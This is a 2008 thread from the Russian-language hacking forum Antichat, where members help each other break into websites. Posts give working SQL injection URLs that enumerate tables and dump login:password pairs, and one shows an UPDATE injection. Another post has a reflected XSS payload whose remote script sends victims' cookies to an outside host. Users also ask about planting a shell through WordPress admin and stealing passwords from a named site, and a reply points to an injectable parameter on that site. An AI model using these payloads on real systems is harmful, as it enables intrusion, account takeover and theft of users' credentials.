ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.02.2008, 19:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
вобщем то, эта ошибка не говорит о том, можно ли или нет провести инъекцию, просто когда возникает ошибка, вызываются функции определенного класса, а этот класс скрипт просто не может найти и все, попробуй сделать правильный скуль запрос
да скуль есть, вот нашел:
Код:
http://site/js/rs.php?query=1%20union%20select%201,version(),3,4,5/*
смотрим исходник страницы, видим
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 04.02.2008 в 19:32..
|
|
|

05.02.2008, 02:03
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме: 39650
Репутация:
15
|
|
Прошу помочь если вообще способы залившке шелла через админку WordPress'a?
|
|
|

05.02.2008, 02:16
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме: 256744
Репутация:
16
|
|
Сообщение от m0use
нашел sql injection на одном сайте все стандартно....
site.ru/index.php?id=-1+union+select+1,2,3,4...../*
version() -> 5.0.37
user() -> не рут
через INFORMATION_SCHEMA.TABLES можно просматривать таблицы...
на этом же сайте есть форум адрес типа forum.site.ru
как я понимаю через "INFORMATION_SCHEMA.TABLES" я должен видеть таблицы форума или же нет?
хорошо а могу я прикрутить UPDATE? и как это должно выглядить...
|
|
|

05.02.2008, 04:38
|
|
Новичок
Регистрация: 29.01.2007
Сообщений: 2
Провел на форуме: 39860
Репутация:
0
|
|
Буду признателен если
Всем привет , в кратце обьясню , всю жизнь работал СИ , вполне успешно никогда не жаловался =) ! Сейчас встал вопрос скажем так прогресса , вопрос куда двигаться от чего плясать , ЗАРАНЕЕ извеняюсь если задам кучу глупых вопросов , всё что я прошу подсказать , дальше сам разберусь .
есть сайтик нуу допустим http://portal.kurkino.net.ru/ насмотревшись всяких крутых роликов я начал с дуру подбирать всякие словечки в итоге нашёл "test.php" "/test/" "/test/admin/" как я понял сервак стоит на апаче , нооо дальше я не ушёл , и вот в чём просьба , скажите пожалуйста , а лучше киньте ссылки на статьи , предположим цель ну скажем выведать пороли пользователей или пороли админа , какие технологии и вообще знания стоят применять , Всё что связанно с соц инженерии сразу отпадает я и так всё знаю , уже не интересно , я крайне надеюсь что вы поняли чего я хочу , просто подскажите что к чему и зачем . Заранее спасибо
П.С.- с удовольствием возьму уроки(естессно не бесплатно) у знающего дело профессионала , который мне всё разжуёт ! Спасибо за внимание. Не судите строго.
|
|
|

05.02.2008, 11:59
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме: 1379382
Репутация:
378
|
|
хм...
на роль "знающего профессионала" я не претемндую, но все же выскажу парочку своих соображений:
1. во-первых, (хотя это дело вкуса) посмотрел бы движок сайта. что-то мне подсказывает, что там должна быть скуль (SQL-inj).
http://portal.kurkino.net.ru/portal.php?module=news&view_gid=4'
Про скули почитай в этой же ветке форума.
2. во-вторых, сайтец построен как минимум на двух движках:
- движок сайта - смотри в самом низу страницы: Portal System ULN-Web. Зная PHP и имея на руках исходные его коды можно самому найти уязвимость в двиге. Как вариант - пошерстить по багтракам - мож уязвимость там уже нашли.
- движок форума - см. выше.
А вот для изучения исходников тебе понадобится выучить PHP. На ачате для этого материалов предостаточно.
И вообще, как вариант, можешь, опять же на форуме просто попросить взломать сайт =)
удачи...
|
|
|

05.02.2008, 12:05
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме: 1536533
Репутация:
370
|
|
m0use, ты видишь все таблицы SQL, там же будут и от форума.
UPDATE имя_таблицы SET поле=значение
|
|
|

05.02.2008, 21:13
|
|
Новичок
Регистрация: 04.02.2008
Сообщений: 4
Провел на форуме: 114780
Репутация:
4
|
|
Пассивный XSS
Сообщение от it's my
Код:
http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E'%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E
--
не подскажите почему не работает мой скрипт? мой скрипт -
Сообщение от it's my
Код:
document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E%27%22%3E%3Cscript%20%73%72%63%3D%68%74%74%70%3A//%78%78%73%2D%78%78%73%2E%6E%6D%2E%72%75%2F%6A%73%2E%6A%73%3E%20%3C/script%3E%0D%0A";
по сути это
Сообщение от it's my
Код:
document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script src=http://xxs-xxs.nm.ru/js.js> </script>";
а в оригенале
Сообщение от it's my
Код:
http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script>alert(document.coockie)</script>>";
xxs-xxs.nm.ru/js.js - там
Сообщение от it's my
Код:
<script> img = new Image(); img.src="http://s.netsec.ru/Onex.gif?"+document.cookie;</script>
Помогите плиз разобраться =(
И еще вопрос.. если тырю куки с zzz.ru то и дыра должна быть в zzz.ru ? Спасибо
|
|
|

05.02.2008, 21:26
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
bobob, возможно таблицы находятся в других базах. Узнай базу таблицы:
... , concat(table_name,0x3a,table_schema), ... +from+information_schema.tables
а потом пиши имя базы перед именем таблицы
... ,password, ... +from+имя_базы.users/*
А возможно просто нету доступа к этим таблицам :\
|
|
|

05.02.2008, 21:38
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Типа такого
script.php?id=-1+union+select+1,2,password,4+from+used.used_users/*
|
|
|

05.02.2008, 21:49
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
bobob, ты читал мануалы по инъекциям ? )) Перечитай )))
Допустим у тебя есть таблица calendarusers. Тебе нужно узнать в какой БД она находится. Для этого пишешь запрос
script.php?id=-1+union+select+1,2,table_schema,4+from+information _schema.tables+where+table_name='calendarusers'/*
Допустим в ответ вывело - firstbd. Тогда составляешь запрос
script.php?id=-1+union+select+1,2,concat_ws(0x2F,login,password), 4+from+firstbd.calendarusers/*
Теперь делай по аналогии
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|